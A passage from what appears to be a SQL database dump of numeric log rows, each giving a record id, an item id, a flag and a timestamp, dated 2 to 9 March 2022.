01:15:54'),(46414,3691,1,'2022-03-02','2022-03-02 01:33:37'),(46415,3117,1,'2022-03-02','2022-03-02 02:03:39'),(46416,1588,1,'2022-03-02','2022-03-02 02:35:09'),(46417,3746,1,'2022-03-02','2022-03-02 03:33:39'),(46418,2457,1,'2022-03-02','2022-03-02 04:33:38'),(46419,1600,1,'2022-03-02','2022-03-02 05:09:27'),(46420,72,1,'2022-03-02','2022-03-02 05:56:41'),(46421,469,1,'2022-03-02','2022-03-02 06:35:07'),(46422,570,1,'2022-03-02','2022-03-02 07:20:52'),(46423,4517,1,'2022-03-02','2022-03-02 08:00:46'),(46424,1877,1,'2022-03-02','2022-03-02 08:24:08'),(46425,2159,1,'2022-03-02','2022-03-02 09:04:49'),(46426,1598,1,'2022-03-02','2022-03-02 09:30:46'),(46427,1598,1,'2022-03-02','2022-03-02 10:00:47'),(46428,1606,1,'2022-03-02','2022-03-02 10:30:53'),(46429,1602,1,'2022-03-02','2022-03-02 10:43:58'),(46430,4335,1,'2022-03-02','2022-03-02 10:56:29'),(46431,2410,1,'2022-03-02','2022-03-02 11:01:12'),(46432,1586,1,'2022-03-02','2022-03-02 11:09:22'),(46433,470,1,'2022-03-02','2022-03-02 11:16:54'),(46434,68,1,'2022-03-02','2022-03-02 11:24:46'),(46435,1594,1,'2022-03-02','2022-03-02 11:45:57'),(46436,1594,1,'2022-03-02','2022-03-02 11:49:39'),(46437,1586,1,'2022-03-02','2022-03-02 11:54:36'),(46438,2457,1,'2022-03-02','2022-03-02 12:27:47'),(46439,1596,1,'2022-03-02','2022-03-02 13:21:10'),(46440,72,1,'2022-03-02','2022-03-02 13:40:43'),(46441,1544,1,'2022-03-02','2022-03-02 14:22:08'),(46442,4341,1,'2022-03-02','2022-03-02 14:53:44'),(46443,4341,1,'2022-03-02','2022-03-02 14:55:22'),(46444,4341,1,'2022-03-02','2022-03-02 14:56:31'),(46445,4341,1,'2022-03-02','2022-03-02 14:56:41'),(46446,4341,1,'2022-03-02','2022-03-02 14:56:42'),(46447,76,1,'2022-03-02','2022-03-02 14:57:16'),(46448,76,1,'2022-03-02','2022-03-02 14:57:18'),(46449,4341,1,'2022-03-02','2022-03-02 14:59:15'),(46450,4341,1,'2022-03-02','2022-03-02 14:59:32'),(46451,1588,1,'2022-03-02','2022-03-02 15:11:46'),(46452,2813,1,'2022-03-02','2022-03-02 15:12:33'),(46453,3253,1,'2022-03-02','2022-03-02 16:11:57'),(46454,570,1,'2022-03-02','2022-03-02 16:12:25'),(46455,2309,1,'2022-03-02','2022-03-02 16:39:09'),(46456,3006,1,'2022-03-02','2022-03-02 17:11:44'),(46457,3109,1,'2022-03-02','2022-03-02 17:11:47'),(46458,3005,1,'2022-03-02','2022-03-02 18:58:56'),(46459,1598,1,'2022-03-02','2022-03-02 19:15:12'),(46460,2804,1,'2022-03-02','2022-03-02 19:28:58'),(46461,2989,1,'2022-03-02','2022-03-02 19:36:24'),(46462,3285,1,'2022-03-02','2022-03-02 20:02:31'),(46463,3069,1,'2022-03-02','2022-03-02 20:07:56'),(46464,2309,1,'2022-03-02','2022-03-02 20:43:57'),(46465,1612,1,'2022-03-02','2022-03-02 20:56:30'),(46466,3316,1,'2022-03-02','2022-03-02 21:07:54'),(46467,3124,1,'2022-03-02','2022-03-02 21:44:21'),(46468,4457,1,'2022-03-02','2022-03-02 21:45:20'),(46469,4387,1,'2022-03-02','2022-03-02 21:55:37'),(46470,80,1,'2022-03-02','2022-03-02 21:55:58'),(46471,1586,1,'2022-03-02','2022-03-02 22:07:41'),(46472,1612,1,'2022-03-02','2022-03-02 22:07:53'),(46473,2297,1,'2022-03-02','2022-03-02 22:28:26'),(46474,4582,1,'2022-03-02','2022-03-02 22:31:55'),(46475,1594,1,'2022-03-02','2022-03-02 23:55:20'),(46476,2609,1,'2022-03-02','2022-03-02 23:59:51'),(46477,1612,1,'2022-03-03','2022-03-03 00:59:49'),(46478,2775,1,'2022-03-03','2022-03-03 01:10:45'),(46479,4498,1,'2022-03-03','2022-03-03 02:16:55'),(46480,80,1,'2022-03-03','2022-03-03 02:51:29'),(46481,80,1,'2022-03-03','2022-03-03 02:51:37'),(46482,80,1,'2022-03-03','2022-03-03 02:52:28'),(46483,1600,1,'2022-03-03','2022-03-03 03:05:45'),(46484,2159,1,'2022-03-03','2022-03-03 06:45:01'),(46485,1594,1,'2022-03-03','2022-03-03 07:00:12'),(46486,1614,1,'2022-03-03','2022-03-03 07:29:44'),(46487,3781,1,'2022-03-03','2022-03-03 07:44:47'),(46488,3005,1,'2022-03-03','2022-03-03 08:15:03'),(46489,3781,1,'2022-03-03','2022-03-03 08:40:59'),(46490,2769,1,'2022-03-03','2022-03-03 08:44:00'),(46491,4524,1,'2022-03-03','2022-03-03 08:52:02'),(46492,1598,1,'2022-03-03','2022-03-03 09:29:52'),(46493,4524,1,'2022-03-03','2022-03-03 09:44:56'),(46494,4514,1,'2022-03-03','2022-03-03 09:48:35'),(46495,1606,1,'2022-03-03','2022-03-03 10:15:41'),(46496,1600,1,'2022-03-03','2022-03-03 10:26:35'),(46497,1596,1,'2022-03-03','2022-03-03 10:37:45'),(46498,1600,1,'2022-03-03','2022-03-03 10:49:41'),(46499,1600,1,'2022-03-03','2022-03-03 10:52:37'),(46500,1600,1,'2022-03-03','2022-03-03 11:37:24'),(46501,1586,1,'2022-03-03','2022-03-03 12:09:24'),(46502,2769,1,'2022-03-03','2022-03-03 12:30:42'),(46503,68,1,'2022-03-03','2022-03-03 12:34:27'),(46504,1614,1,'2022-03-03','2022-03-03 14:04:47'),(46505,1602,1,'2022-03-03','2022-03-03 14:08:14'),(46506,570,1,'2022-03-03','2022-03-03 14:13:48'),(46507,1602,1,'2022-03-03','2022-03-03 14:23:22'),(46508,91,1,'2022-03-03','2022-03-03 14:25:32'),(46509,91,1,'2022-03-03','2022-03-03 14:25:32'),(46510,91,1,'2022-03-03','2022-03-03 14:25:35'),(46511,570,1,'2022-03-03','2022-03-03 14:28:32'),(46512,471,1,'2022-03-03','2022-03-03 14:28:35'),(46513,2457,1,'2022-03-03','2022-03-03 14:54:44'),(46514,2309,1,'2022-03-03','2022-03-03 15:05:50'),(46515,2309,1,'2022-03-03','2022-03-03 15:05:59'),(46516,2309,1,'2022-03-03','2022-03-03 15:06:15'),(46517,4341,1,'2022-03-03','2022-03-03 15:10:19'),(46518,4520,1,'2022-03-03','2022-03-03 15:24:34'),(46519,4341,1,'2022-03-03','2022-03-03 16:22:31'),(46520,1582,1,'2022-03-03','2022-03-03 16:23:35'),(46521,4341,1,'2022-03-03','2022-03-03 16:27:42'),(46522,3109,1,'2022-03-03','2022-03-03 17:18:29'),(46523,3764,1,'2022-03-03','2022-03-03 19:35:59'),(46524,3691,1,'2022-03-03','2022-03-03 20:24:55'),(46525,1600,1,'2022-03-03','2022-03-03 20:38:44'),(46526,1877,1,'2022-03-03','2022-03-03 21:04:17'),(46527,4566,1,'2022-03-03','2022-03-03 21:10:58'),(46528,1872,1,'2022-03-03','2022-03-03 21:16:59'),(46529,2420,1,'2022-03-03','2022-03-03 21:30:13'),(46530,1608,1,'2022-03-03','2022-03-03 22:10:58'),(46531,2297,1,'2022-03-03','2022-03-03 22:10:59'),(46532,1594,1,'2022-03-03','2022-03-03 22:33:08'),(46533,1608,1,'2022-03-03','2022-03-03 22:41:04'),(46534,91,1,'2022-03-03','2022-03-03 22:41:10'),(46535,1594,1,'2022-03-03','2022-03-03 22:44:06'),(46536,1614,1,'2022-03-03','2022-03-03 22:56:30'),(46537,2150,1,'2022-03-03','2022-03-03 23:10:58'),(46538,3041,1,'2022-03-03','2022-03-03 23:11:00'),(46539,4428,1,'2022-03-04','2022-03-04 00:11:00'),(46540,3240,1,'2022-03-04','2022-03-04 01:10:57'),(46541,3698,1,'2022-03-04','2022-03-04 03:11:59'),(46542,80,1,'2022-03-04','2022-03-04 03:22:14'),(46543,80,1,'2022-03-04','2022-03-04 03:23:01'),(46544,80,1,'2022-03-04','2022-03-04 04:12:47'),(46545,1606,1,'2022-03-04','2022-03-04 06:27:38'),(46546,80,1,'2022-03-04','2022-03-04 07:07:02'),(46547,2769,1,'2022-03-04','2022-03-04 07:11:43'),(46548,72,1,'2022-03-04','2022-03-04 07:26:25'),(46549,1582,1,'2022-03-04','2022-03-04 08:57:47'),(46550,2309,1,'2022-03-04','2022-03-04 10:24:03'),(46551,3691,1,'2022-03-04','2022-03-04 10:25:29'),(46552,570,1,'2022-03-04','2022-03-04 10:35:30'),(46553,1598,1,'2022-03-04','2022-03-04 10:45:33'),(46554,2420,1,'2022-03-04','2022-03-04 11:15:32'),(46555,3117,1,'2022-03-04','2022-03-04 11:55:30'),(46556,4520,1,'2022-03-04','2022-03-04 12:25:31'),(46557,4238,1,'2022-03-04','2022-03-04 12:27:42'),(46558,4238,1,'2022-03-04','2022-03-04 12:28:07'),(46559,4238,1,'2022-03-04','2022-03-04 12:28:19'),(46560,4520,1,'2022-03-04','2022-03-04 12:55:29'),(46561,3438,1,'2022-03-04','2022-03-04 13:17:14'),(46562,1586,1,'2022-03-04','2022-03-04 13:28:50'),(46563,4341,1,'2022-03-04','2022-03-04 13:38:00'),(46564,1602,1,'2022-03-04','2022-03-04 13:48:40'),(46565,4517,1,'2022-03-04','2022-03-04 13:55:50'),(46566,2809,1,'2022-03-04','2022-03-04 14:27:30'),(46567,68,1,'2022-03-04','2022-03-04 14:34:27'),(46568,91,1,'2022-03-04','2022-03-04 15:19:25'),(46569,2658,1,'2022-03-04','2022-03-04 15:35:25'),(46570,2704,1,'2022-03-04','2022-03-04 15:58:07'),(46571,80,1,'2022-03-04','2022-03-04 16:04:11'),(46572,80,1,'2022-03-04','2022-03-04 16:04:41'),(46573,1596,1,'2022-03-04','2022-03-04 16:38:17'),(46574,2411,1,'2022-03-04','2022-03-04 17:38:19'),(46575,4416,1,'2022-03-04','2022-03-04 17:39:56'),(46576,2411,1,'2022-03-04','2022-03-04 18:08:18'),(46577,2813,1,'2022-03-04','2022-03-04 18:25:32'),(46578,2813,1,'2022-03-04','2022-03-04 18:55:32'),(46579,2309,1,'2022-03-04','2022-03-04 19:18:18'),(46580,2813,1,'2022-03-04','2022-03-04 19:25:32'),(46581,3107,1,'2022-03-04','2022-03-04 19:38:22'),(46582,3253,1,'2022-03-04','2022-03-04 19:55:47'),(46583,1592,1,'2022-03-04','2022-03-04 20:25:36'),(46584,1872,1,'2022-03-04','2022-03-04 20:45:18'),(46585,3006,1,'2022-03-04','2022-03-04 20:55:33'),(46586,1588,1,'2022-03-04','2022-03-04 22:42:45'),(46587,4498,1,'2022-03-04','2022-03-04 23:02:46'),(46588,2769,1,'2022-03-04','2022-03-04 23:42:45'),(46589,570,1,'2022-03-05','2022-03-05 00:06:46'),(46590,1588,1,'2022-03-05','2022-03-05 00:31:08'),(46591,1600,1,'2022-03-05','2022-03-05 01:05:00'),(46592,1877,1,'2022-03-05','2022-03-05 01:06:47'),(46593,4582,1,'2022-03-05','2022-03-05 01:18:46'),(46594,3127,1,'2022-03-05','2022-03-05 01:30:45'),(46595,2769,1,'2022-03-05','2022-03-05 01:44:48'),(46596,4529,1,'2022-03-05','2022-03-05 01:54:59'),(46597,4514,1,'2022-03-05','2022-03-05 02:06:46'),(46598,1872,1,'2022-03-05','2022-03-05 02:18:46'),(46599,3117,1,'2022-03-05','2022-03-05 02:30:46'),(46600,4391,1,'2022-03-05','2022-03-05 02:36:52'),(46601,4517,1,'2022-03-05','2022-03-05 02:42:47'),(46602,4517,1,'2022-03-05','2022-03-05 02:55:02'),(46603,4524,1,'2022-03-05','2022-03-05 03:06:45'),(46604,4566,1,'2022-03-05','2022-03-05 03:18:45'),(46605,4498,1,'2022-03-05','2022-03-05 03:32:58'),(46606,4582,1,'2022-03-05','2022-03-05 03:43:08'),(46607,4412,1,'2022-03-05','2022-03-05 04:52:35'),(46608,1600,1,'2022-03-05','2022-03-05 05:10:02'),(46609,68,1,'2022-03-05','2022-03-05 05:46:52'),(46610,1606,1,'2022-03-05','2022-03-05 09:38:20'),(46611,1594,1,'2022-03-05','2022-03-05 09:43:29'),(46612,1598,1,'2022-03-05','2022-03-05 10:13:28'),(46613,2159,1,'2022-03-05','2022-03-05 10:28:30'),(46614,1600,1,'2022-03-05','2022-03-05 10:43:45'),(46615,1600,1,'2022-03-05','2022-03-05 10:58:33'),(46616,4524,1,'2022-03-05','2022-03-05 12:58:29'),(46617,4566,1,'2022-03-05','2022-03-05 13:48:58'),(46618,3271,1,'2022-03-05','2022-03-05 14:50:55'),(46619,1582,1,'2022-03-05','2022-03-05 14:51:10'),(46620,2309,1,'2022-03-05','2022-03-05 15:41:46'),(46621,1602,1,'2022-03-05','2022-03-05 15:51:51'),(46622,72,1,'2022-03-05','2022-03-05 16:03:51'),(46623,1598,1,'2022-03-05','2022-03-05 16:48:29'),(46624,80,1,'2022-03-05','2022-03-05 17:06:38'),(46625,1600,1,'2022-03-05','2022-03-05 18:17:23'),(46626,1600,1,'2022-03-05','2022-03-05 18:21:34'),(46627,2457,1,'2022-03-05','2022-03-05 18:28:11'),(46628,1600,1,'2022-03-05','2022-03-05 18:28:13'),(46629,1600,1,'2022-03-05','2022-03-05 18:28:51'),(46630,1586,1,'2022-03-05','2022-03-05 18:46:17'),(46631,1586,1,'2022-03-05','2022-03-05 18:46:18'),(46632,2704,1,'2022-03-05','2022-03-05 18:51:13'),(46633,1586,1,'2022-03-05','2022-03-05 19:26:26'),(46634,4396,1,'2022-03-05','2022-03-05 20:12:43'),(46635,3691,1,'2022-03-05','2022-03-05 21:14:39'),(46636,1606,1,'2022-03-05','2022-03-05 21:23:14'),(46637,4566,1,'2022-03-05','2022-03-05 21:57:33'),(46638,1586,1,'2022-03-05','2022-03-05 22:53:17'),(46639,1877,1,'2022-03-05','2022-03-05 23:21:40'),(46640,4514,1,'2022-03-05','2022-03-05 23:44:12'),(46641,4566,1,'2022-03-06','2022-03-06 00:01:10'),(46642,2297,1,'2022-03-06','2022-03-06 01:11:26'),(46643,1608,1,'2022-03-06','2022-03-06 01:11:47'),(46644,3041,1,'2022-03-06','2022-03-06 01:41:31'),(46645,2150,1,'2022-03-06','2022-03-06 01:41:34'),(46646,4416,1,'2022-03-06','2022-03-06 02:11:25'),(46647,473,1,'2022-03-06','2022-03-06 02:11:27'),(46648,1608,1,'2022-03-06','2022-03-06 02:41:34'),(46649,4566,1,'2022-03-06','2022-03-06 03:07:00'),(46650,2297,1,'2022-03-06','2022-03-06 03:24:35'),(46651,72,1,'2022-03-06','2022-03-06 03:26:17'),(46652,1594,1,'2022-03-06','2022-03-06 06:33:51'),(46653,1722,1,'2022-03-06','2022-03-06 06:35:58'),(46654,1722,1,'2022-03-06','2022-03-06 06:42:30'),(46655,2410,1,'2022-03-06','2022-03-06 07:05:01'),(46656,3045,1,'2022-03-06','2022-03-06 07:34:43'),(46657,1720,1,'2022-03-06','2022-03-06 08:04:57'),(46658,570,1,'2022-03-06','2022-03-06 11:05:18'),(46659,1588,1,'2022-03-06','2022-03-06 12:40:28'),(46660,2410,1,'2022-03-06','2022-03-06 13:15:49'),(46661,1598,1,'2022-03-06','2022-03-06 13:24:17'),(46662,1720,1,'2022-03-06','2022-03-06 13:44:38'),(46663,2410,1,'2022-03-06','2022-03-06 13:45:32'),(46664,4582,1,'2022-03-06','2022-03-06 14:14:21'),(46665,3664,1,'2022-03-06','2022-03-06 14:29:53'),(46666,4582,1,'2022-03-06','2022-03-06 14:34:15'),(46667,3664,1,'2022-03-06','2022-03-06 14:37:46'),(46668,3664,1,'2022-03-06','2022-03-06 14:38:29'),(46669,1715,1,'2022-03-06','2022-03-06 15:23:39'),(46670,2769,1,'2022-03-06','2022-03-06 16:03:22'),(46671,2769,1,'2022-03-06','2022-03-06 16:03:27'),(46672,80,1,'2022-03-06','2022-03-06 16:07:01'),(46673,468,1,'2022-03-06','2022-03-06 16:07:10'),(46674,76,1,'2022-03-06','2022-03-06 16:07:37'),(46675,468,1,'2022-03-06','2022-03-06 16:13:52'),(46676,76,1,'2022-03-06','2022-03-06 16:14:33'),(46677,468,1,'2022-03-06','2022-03-06 16:19:53'),(46678,76,1,'2022-03-06','2022-03-06 16:20:53'),(46679,68,1,'2022-03-06','2022-03-06 16:22:09'),(46680,3674,1,'2022-03-06','2022-03-06 16:23:45'),(46681,87,1,'2022-03-06','2022-03-06 16:26:14'),(46682,469,1,'2022-03-06','2022-03-06 16:27:07'),(46683,87,1,'2022-03-06','2022-03-06 16:27:29'),(46684,470,1,'2022-03-06','2022-03-06 16:27:35'),(46685,87,1,'2022-03-06','2022-03-06 16:28:06'),(46686,474,1,'2022-03-06','2022-03-06 16:28:30'),(46687,87,1,'2022-03-06','2022-03-06 16:29:12'),(46688,488,1,'2022-03-06','2022-03-06 16:29:27'),(46689,87,1,'2022-03-06','2022-03-06 16:29:51'),(46690,480,1,'2022-03-06','2022-03-06 16:30:08'),(46691,87,1,'2022-03-06','2022-03-06 16:30:32'),(46692,468,1,'2022-03-06','2022-03-06 16:30:41'),(46693,76,1,'2022-03-06','2022-03-06 16:32:18'),(46694,468,1,'2022-03-06','2022-03-06 16:38:30'),(46695,1596,1,'2022-03-06','2022-03-06 18:54:29'),(46696,1596,1,'2022-03-06','2022-03-06 19:24:32'),(46697,4457,1,'2022-03-06','2022-03-06 20:05:40'),(46698,2411,1,'2022-03-06','2022-03-06 20:24:33'),(46699,2411,1,'2022-03-06','2022-03-06 20:54:29'),(46700,2813,1,'2022-03-06','2022-03-06 21:02:01'),(46701,2309,1,'2022-03-06','2022-03-06 21:02:10'),(46702,1602,1,'2022-03-06','2022-03-06 21:11:30'),(46703,1610,1,'2022-03-06','2022-03-06 21:12:24'),(46704,1602,1,'2022-03-06','2022-03-06 21:21:33'),(46705,2309,1,'2022-03-06','2022-03-06 21:31:29'),(46706,3253,1,'2022-03-06','2022-03-06 21:32:02'),(46707,3006,1,'2022-03-06','2022-03-06 22:01:40'),(46708,72,1,'2022-03-06','2022-03-06 23:11:15'),(46709,1588,1,'2022-03-06','2022-03-06 23:20:43'),(46710,1608,1,'2022-03-06','2022-03-06 23:23:06'),(46711,4238,1,'2022-03-06','2022-03-06 23:29:55'),(46712,1610,1,'2022-03-06','2022-03-06 23:58:35'),(46713,1588,1,'2022-03-07','2022-03-07 00:12:26'),(46714,1588,1,'2022-03-07','2022-03-07 01:31:00'),(46715,4412,1,'2022-03-07','2022-03-07 02:32:57'),(46716,1598,1,'2022-03-07','2022-03-07 03:25:30'),(46717,89,1,'2022-03-07','2022-03-07 04:12:19'),(46718,1544,1,'2022-03-07','2022-03-07 04:12:36'),(46719,4566,1,'2022-03-07','2022-03-07 05:08:25'),(46720,72,1,'2022-03-07','2022-03-07 07:03:32'),(46721,2775,1,'2022-03-07','2022-03-07 07:45:05'),(46722,1602,1,'2022-03-07','2022-03-07 07:53:39'),(46723,1544,1,'2022-03-07','2022-03-07 09:33:41'),(46724,1594,1,'2022-03-07','2022-03-07 09:43:46'),(46725,2769,1,'2022-03-07','2022-03-07 09:58:38'),(46726,1598,1,'2022-03-07','2022-03-07 10:19:09'),(46727,1598,1,'2022-03-07','2022-03-07 10:21:09'),(46728,1594,1,'2022-03-07','2022-03-07 10:26:24'),(46729,2159,1,'2022-03-07','2022-03-07 11:14:11'),(46730,4582,1,'2022-03-07','2022-03-07 11:21:05'),(46731,1600,1,'2022-03-07','2022-03-07 11:51:05'),(46732,2159,1,'2022-03-07','2022-03-07 12:04:08'),(46733,1544,1,'2022-03-07','2022-03-07 12:08:37'),(46734,2769,1,'2022-03-07','2022-03-07 12:21:05'),(46735,1596,1,'2022-03-07','2022-03-07 12:27:28'),(46736,1877,1,'2022-03-07','2022-03-07 12:31:05'),(46737,2769,1,'2022-03-07','2022-03-07 12:41:04'),(46738,3498,1,'2022-03-07','2022-03-07 12:50:49'),(46739,3430,1,'2022-03-07','2022-03-07 12:50:49'),(46740,3438,1,'2022-03-07','2022-03-07 12:50:49'),(46741,3482,1,'2022-03-07','2022-03-07 12:50:50'),(46742,2956,1,'2022-03-07','2022-03-07 12:50:51'),(46743,3742,1,'2022-03-07','2022-03-07 12:50:52'),(46744,4524,1,'2022-03-07','2022-03-07 12:51:08'),(46745,1594,1,'2022-03-07','2022-03-07 13:01:04'),(46746,4404,1,'2022-03-07','2022-03-07 14:20:19'),(46747,68,1,'2022-03-07','2022-03-07 15:06:05'),(46748,72,1,'2022-03-07','2022-03-07 15:06:33'),(46749,1606,1,'2022-03-07','2022-03-07 15:13:01'),(46750,1600,1,'2022-03-07','2022-03-07 15:23:38'),(46751,1600,1,'2022-03-07','2022-03-07 15:25:06'),(46752,3072,1,'2022-03-07','2022-03-07 17:06:57'),(46753,4524,1,'2022-03-07','2022-03-07 17:39:54'),(46754,1602,1,'2022-03-07','2022-03-07 19:06:52'),(46755,3691,1,'2022-03-07','2022-03-07 19:09:45'),(46756,2769,1,'2022-03-07','2022-03-07 20:31:48'),(46757,1586,1,'2022-03-07','2022-03-07 20:57:49'),(46758,3691,1,'2022-03-07','2022-03-07 21:17:37'),(46759,1606,1,'2022-03-07','2022-03-07 21:47:43'),(46760,3109,1,'2022-03-07','2022-03-07 21:57:36'),(46761,1600,1,'2022-03-07','2022-03-07 22:17:43'),(46762,3107,1,'2022-03-07','2022-03-07 22:48:20'),(46763,3109,1,'2022-03-07','2022-03-07 23:04:36'),(46764,4566,1,'2022-03-07','2022-03-07 23:09:45'),(46765,3479,1,'2022-03-07','2022-03-07 23:26:57'),(46766,72,1,'2022-03-07','2022-03-07 23:28:39'),(46767,3781,1,'2022-03-07','2022-03-07 23:34:09'),(46768,1606,1,'2022-03-08','2022-03-08 00:22:25'),(46769,1586,1,'2022-03-08','2022-03-08 00:39:36'),(46770,76,1,'2022-03-08','2022-03-08 00:56:32'),(46771,68,1,'2022-03-08','2022-03-08 00:59:25'),(46772,80,1,'2022-03-08','2022-03-08 00:59:58'),(46773,76,1,'2022-03-08','2022-03-08 01:01:40'),(46774,479,1,'2022-03-08','2022-03-08 01:21:37'),(46775,1872,1,'2022-03-08','2022-03-08 02:12:17'),(46776,1606,1,'2022-03-08','2022-03-08 03:07:11'),(46777,2297,1,'2022-03-08','2022-03-08 03:21:34'),(46778,1608,1,'2022-03-08','2022-03-08 03:21:36'),(46779,1594,1,'2022-03-08','2022-03-08 03:38:04'),(46780,91,1,'2022-03-08','2022-03-08 03:42:19'),(46781,473,1,'2022-03-08','2022-03-08 03:51:26'),(46782,3041,1,'2022-03-08','2022-03-08 03:51:56'),(46783,2150,1,'2022-03-08','2022-03-08 04:21:34'),(46784,4428,1,'2022-03-08','2022-03-08 04:23:50'),(46785,4428,1,'2022-03-08','2022-03-08 04:27:11'),(46786,4428,1,'2022-03-08','2022-03-08 04:29:07'),(46787,1612,1,'2022-03-08','2022-03-08 04:51:04'),(46788,4416,1,'2022-03-08','2022-03-08 04:52:43'),(46789,3781,1,'2022-03-08','2022-03-08 05:20:07'),(46790,1600,1,'2022-03-08','2022-03-08 05:43:28'),(46791,1608,1,'2022-03-08','2022-03-08 07:45:14'),(46792,4457,1,'2022-03-08','2022-03-08 08:01:06'),(46793,1544,1,'2022-03-08','2022-03-08 08:25:29'),(46794,72,1,'2022-03-08','2022-03-08 08:33:21'),(46795,3316,1,'2022-03-08','2022-03-08 09:24:33'),(46796,1598,1,'2022-03-08','2022-03-08 09:27:11'),(46797,1598,1,'2022-03-08','2022-03-08 09:28:16'),(46798,1598,1,'2022-03-08','2022-03-08 09:28:44'),(46799,570,1,'2022-03-08','2022-03-08 09:48:04'),(46800,3541,1,'2022-03-08','2022-03-08 10:42:32'),(46801,1709,1,'2022-03-08','2022-03-08 10:44:42'),(46802,1709,1,'2022-03-08','2022-03-08 10:46:23'),(46803,1709,1,'2022-03-08','2022-03-08 10:46:48'),(46804,1709,1,'2022-03-08','2022-03-08 10:48:05'),(46805,91,1,'2022-03-08','2022-03-08 10:48:42'),(46806,2989,1,'2022-03-08','2022-03-08 10:53:23'),(46807,91,1,'2022-03-08','2022-03-08 10:54:21'),(46808,3541,1,'2022-03-08','2022-03-08 10:55:02'),(46809,479,1,'2022-03-08','2022-03-08 10:56:14'),(46810,1709,1,'2022-03-08','2022-03-08 10:56:31'),(46811,1709,1,'2022-03-08','2022-03-08 10:56:39'),(46812,91,1,'2022-03-08','2022-03-08 10:57:10'),(46813,570,1,'2022-03-08','2022-03-08 11:20:09'),(46814,3090,1,'2022-03-08','2022-03-08 12:06:31'),(46815,471,1,'2022-03-08','2022-03-08 12:09:41'),(46816,4514,1,'2022-03-08','2022-03-08 12:25:13'),(46817,470,1,'2022-03-08','2022-03-08 12:41:57'),(46818,4335,1,'2022-03-08','2022-03-08 12:59:54'),(46819,1582,1,'2022-03-08','2022-03-08 13:00:28'),(46820,1728,1,'2022-03-08','2022-03-08 13:14:47'),(46821,1728,1,'2022-03-08','2022-03-08 13:15:08'),(46822,1728,1,'2022-03-08','2022-03-08 13:15:26'),(46823,1728,1,'2022-03-08','2022-03-08 13:15:51'),(46824,4520,1,'2022-03-08','2022-03-08 13:46:16'),(46825,3102,1,'2022-03-08','2022-03-08 13:49:49'),(46826,4238,1,'2022-03-08','2022-03-08 14:51:17'),(46827,472,1,'2022-03-08','2022-03-08 15:19:11'),(46828,3090,1,'2022-03-08','2022-03-08 15:20:07'),(46829,1598,1,'2022-03-08','2022-03-08 15:28:54'),(46830,1877,1,'2022-03-08','2022-03-08 16:05:15'),(46831,108,1,'2022-03-08','2022-03-08 16:08:45'),(46832,4582,1,'2022-03-08','2022-03-08 16:39:09'),(46833,2161,1,'2022-03-08','2022-03-08 16:41:23'),(46834,2161,1,'2022-03-08','2022-03-08 16:42:03'),(46835,2161,1,'2022-03-08','2022-03-08 16:42:29'),(46836,4582,1,'2022-03-08','2022-03-08 16:48:37'),(46837,1870,1,'2022-03-08','2022-03-08 17:02:54'),(46838,1614,1,'2022-03-08','2022-03-08 17:50:19'),(46839,1594,1,'2022-03-08','2022-03-08 19:18:53'),(46840,1596,1,'2022-03-08','2022-03-08 21:00:14'),(46841,2411,1,'2022-03-08','2022-03-08 22:01:58'),(46842,1596,1,'2022-03-08','2022-03-08 22:32:03'),(46843,72,1,'2022-03-08','2022-03-08 22:52:52'),(46844,1602,1,'2022-03-08','2022-03-08 22:56:37'),(46845,2813,1,'2022-03-08','2022-03-08 22:57:31'),(46846,1602,1,'2022-03-08','2022-03-08 23:11:40'),(46847,2751,1,'2022-03-08','2022-03-08 23:13:31'),(46848,1588,1,'2022-03-08','2022-03-08 23:27:10'),(46849,3253,1,'2022-03-08','2022-03-08 23:27:40'),(46850,1598,1,'2022-03-08','2022-03-08 23:49:49'),(46851,3006,1,'2022-03-08','2022-03-08 23:56:25'),(46852,4498,1,'2022-03-08','2022-03-08 23:56:50'),(46853,4582,1,'2022-03-09','2022-03-09 00:10:17'),(46854,4498,1,'2022-03-09','2022-03-09 00:24:01'),(46855,1592,1,'2022-03-09','2022-03-09 00:56:36'),(46856,1600,1,'2022-03-09','2022-03-09 01:01:49'),(46857,1720,1,'2022-03-09','2022-03-09 01:16:42'),(46858,1588,1,'2022-03-09','2022-03-09 01:44:38'),(46859,1588,1,'2022-03-09','2022-03-09 02:54:41'),(46860,1602,1,'2022-03-09','2022-03-09 03:47:21'),(46861,1602,1,'2022-03-09','2022-03-09 03:47:25'),(46862,479,1,'2022-03-09','2022-03-09 04:32:13'),(46863,3090,1,'2022-03-09','2022-03-09 05:16:20'),(46864,3038,1,'2022-03-09','2022-03-09 05:48:14'),(46865,2911,1,'2022-03-09','2022-03-09 06:06:47'),(46866,1715,1,'2022-03-09','2022-03-09 07:26:56'),(46867,72,1,'2022-03-09','2022-03-09 07:43:32'),(46868,1600,1,'2022-03-09','2022-03-09 08:02:28'),(46869,1544,1,'2022-03-09','2022-03-09 09:22:58'),(46870,1606,1,'2022-03-09','2022-03-09 09:52:47'),(46871,1586,1,'2022-03-09','2022-03-09 10:08:47'),(46872,4341,1,'2022-03-09','2022-03-09 10:22:25'),(46873,89,1,'2022-03-09','2022-03-09 10:47:06'),(46874,1612,1,'2022-03-09','2022-03-09 11:02:36'),(46875,1612,1,'2022-03-09','2022-03-09 11:03:19'),(46876,1594,1,'2022-03-09','2022-03-09 11:28:09'),(46877,1606,1,'2022-03-09','2022-03-09 11:39:07'),(46878,1594,1,'2022-03-09','2022-03-09 11:57:16'),(46879,1598,1,'2022-03-09','2022-03-09 12:05:06'),(46880,1600,1,'2022-03-09','2022-03-09 12:39:00'),(46881,1606,1,'2022-03-09','2022-03-09 13:09:44'),(46882,3069,1,'2022-03-09','2022-03-09 13:26:32'),(46883,2159,1,'2022-03-09','2022-03-09 13:49:38'),(46884,2159,1,'2022-03-09','2022-03-09 14:42:08'),(46885,2813,1,'2022-03-09','2022-03-09 14:45:14'),(46886,1877,1,'2022-03-09','2022-03-09 14:51:13'),(46887,1544,1,'2022-03-09','2022-03-09 15:27:46'),(46888,1544,1,'2022-03-09','2022-03-09 15:37:57'),(46889,2309,1,'2022-03-09','2022-03-09 15:51:49'),(46890,1602,1,'2022-03-09','2022-03-09 16:19:27'),(46891,1870,1,'2022-03-09','2022-03-09 16:52:00'),(46892,2904,1,'2022-03-09','2022-03-09 16:52:11'),(46893,1612,1,'2022-03-09','2022-03-09 17:21:33'),(46894,1612,1,'2022-03-09','2022-03-09 17:23:45'),(46895,1612,1,'2022-03-09','2022-03-09 17:24:00'),(46896,4524,1,'2022-03-09','2022-03-09 18:11:59'),(46897,2904,1,'2022-03-09','2022-03-09 20:08:01'),(46898,2813,1,'2022-03-09','2022-03-09 20:15:13'),(46899,1586,1,'2022-03-09','2022-03-09 